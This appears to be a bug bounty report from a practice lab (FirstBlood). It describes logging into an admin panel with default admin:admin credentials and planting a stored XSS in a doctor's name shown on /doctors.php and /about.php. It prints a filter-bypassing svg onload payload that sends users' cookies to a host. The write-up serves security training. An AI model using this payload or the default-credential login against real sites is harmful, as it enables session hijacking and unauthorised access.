FirstBlood-#1124 — Stored XSS in the Doctor Name on /doctors.php as well as /about.php
This issue was discovered on FirstBlood v3
On 2022-12-08, mr_xhunt 
Level 8
reported:
Getting started
Learn about vulnerability types 
Getting started in bug bounties 
Test your knowledge
Free Web Application Challenges
Guides for your hunts 
ZSeano's Methodology
Effective Note Taking for bug bounties
Useful Resources 
Disclosed HackerOne Reports 
Our community
Endorsed Members
Hackevents 
Member Articles
Summary:
I was able to login using default credentials: admin:admin
While modifying the name of the Doctor found there is XSS filter in the name parameter which checks for > tag
but we can obfuscate by creating a payload without > tag and Succefully create Stored XSS against Authenticated as well as Non Authed users
Steps To Reprduce:
-
You need to login to drpanel
-
Now Modify and Doctor data and Intercept using burp
-
Now Put the payload in the name parameter
-
Now send the Request
- Now visit the endpoint:
/doctors.php and /about.php, the XSS is executed and Succefully leaks the Cookie of the users
POC:
- /doctors.php
- /about.php
P1 CRITICAL
Endpoint: /doctors.php & /about.php
Parameter: name
Payload: "><svg onload=alert(document.location=`https://localhost/?${document.cookie}`)//
FirstBlood ID: 48
Vulnerability Type: Auth issues
The /drpanel/login.php endpoint contains weak credentials which allows users to access the admin panel (admin:admin)
FirstBlood ID: 56
Vulnerability Type: Stored XSS
It is possible to achieve stored XSS on the /about.php endpoint via a malicious doctors name
FirstBlood ID: 55
Vulnerability Type: Stored XSS
It is possible to achieve stored XSS on the /doctors.php endpoint via a malicious doctors name
Report Feedback
Creator & Administrator
Congratulations, you were the SECOND user to discover stored XSS on about.php via the doctors name